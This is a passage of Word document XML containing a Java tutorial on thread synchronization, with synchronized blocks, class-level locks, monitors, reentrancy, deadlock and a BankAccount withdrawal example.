          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2. Synchronized Block:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F20240E"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You can also synchronize a specific block of code within a method using synchronized block. This provides finer control over the synchronization, as you can choose exactly which part of the code needs synchronization, rather than synchronizing the entire method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F13ECDA"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class Counter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7230C7"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    private int count = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C60400" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C947FAB"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public void increment() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F28CC7"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synchronized (this) { // Synchronize only this block of code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0F76FA"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count++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F540FA4"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E8D09B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C97B5D4" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="132778F5"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public int getCount() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C581B0E"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return count;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B12CFF1"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBFFABC"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F02E240" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1240"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>In this case, only the count++ operation is synchronized, making it less restrictive than synchronizing the entire method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAE9713" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3. Synchronized Block with Class-level Lock:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E6AE57"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You can synchronize a block of code using the class-level lock (static methods), which ensures that only one thread can execute the synchronized block for the entire class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBAEB97"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class Counter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19ECCB3D"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private static int count = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3D97CC" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51F54AE2"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public static void increment() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A469329"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synchronized (Counter.class) { // Synchronizing on the class-level lock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10885FF8"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count++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD658ED"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1E5FE6"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6451F8A8" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37BD39D8"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public static int getCount() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7160F420"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return count;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F82559B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361AD707"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB7F877" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1241"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Here, Counter.class is the lock object, and the synchronized block ensures that only one thread can increment the static count variable at a time, for the entire class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C3CDAA" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Key Concepts of Synchronization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB5C3D5" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1242"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Locks</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In Java, every object has an intrinsic lock associated with it. When a synchronized method is called on an object, the calling thread must acquire the lock of that object before proceeding. If another thread holds the lock, the calling thread must wait until the lock is released.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04268A64" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1242"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Monitor</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The object used to synchronize code is often referred to as a </w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>monitor</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Each object can be considered as a monitor, and only one thread can hold the monitor (lock) at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5597C0CB" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1242"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reentrant Locks</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Java allows threads to re-enter a synchronized block or method. For example, if a thread has already acquired a lock on an object, it can enter other synchronized blocks (or methods) without deadlocking itself. This is called </w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reentrancy</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CC1ADE" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1242"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Deadlock</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Deadlock can occur if two or more threads wait indefinitely for each other to release locks. For example, if Thread 1 holds Lock A and is waiting for Lock B, and Thread 2 holds Lock B and is waiting for Lock A, they will be in a deadlock situation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662F786F" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1242"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Performance Impact</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Synchronization can introduce overhead due to the need for acquiring and releasing locks, which might reduce performance, especially in scenarios where the contention for resources is high. This is one reason why synchronization should be used carefully and only when necessary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462C2698" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example of Synchronized Methods:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D1811E"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class BankAccount {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5324F4"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private int balance = 1000;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BD824D" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F3C9FC3"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 Synchronized method to ensure only one thread can withdraw at a time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C9C2E0"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public synchronized void withdraw(int amount) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E45C659"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if (balance &gt;= amount) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D6F5F0"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System.out.println("Withdrawing: " + amount);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A5B51B"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balance -= amount;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A219A22"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">            System.out.println("Balance after withdrawal: " + balance);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2622F593"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 else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2633DF79"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System.out.println("Insufficient balance!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F10DAFB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34ADA79A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05037F50"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7237D4A9" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62E644DD"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public class SynchronizedDemo {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36ECBAA9"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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C1C035"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BankAccount account = new BankAccount();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF790C9" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D7A5F90"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 Create two threads trying to access the synchronized method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB0EA68"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Thread t1 = new Thread(() -&gt; account.withdraw(500));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001D827C"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Thread t2 = new Thread(() -&gt; account.withdraw(700));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07237557" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7659371D"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t1.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A437B4"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t2.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F9DFC3"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0A20D7" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719AD29C" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1243"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>In this example, the withdraw() method is synchronized, which means only one thread will be able to withdraw from the account at a time, preventing race conditions and ensuring that the balance remains correct.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8EAA46" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Summary of Synchronization in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B272629" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1244"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: To ensure thread safety and prevent inconsistent data when multiple threads access shared resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EFA77E" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1244"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Achieved through synchronized methods, synchronized blocks, and using locks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF97A3E" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1244"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Should be used carefully to avoid performance bottlenecks and deadlocks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D384E6" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1244"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Alternatives</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Java provides ReentrantLock (for more advanced locking features) and other concurrency utilities in java.util.concurrent package to manage thread synchronization more flexibly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B1E026" w14:textId="70188081" w:rsidR="00096260" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00096260">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:pict w14:anchorId="337D7C5B">
          <v:rect id="_x0000_i1861" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
